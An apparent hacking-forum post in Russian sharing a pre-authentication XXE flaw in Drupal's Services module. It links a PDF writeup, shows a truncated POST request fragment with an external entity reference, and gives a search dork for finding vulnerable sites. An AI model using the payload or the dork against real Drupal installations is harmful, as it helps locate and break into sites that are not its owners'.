27.04.2015, 16:22
|
|
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
С нами:
7552406
Репутация:
724
|
|
Pre-auth XXE in Drupal Services module, neat tricks to bypass restrictions inside
Подробное описание (PDF): http://www.synacktiv.fr/ressources/s...e_services.pdf
Код:
POST /drupal7.28/?q=test/node HTTP/1.1
[...]
%evil;
]>
test
ДОРК: "inurl:sites/all/modules/services/servers/rest_server/" |
|
|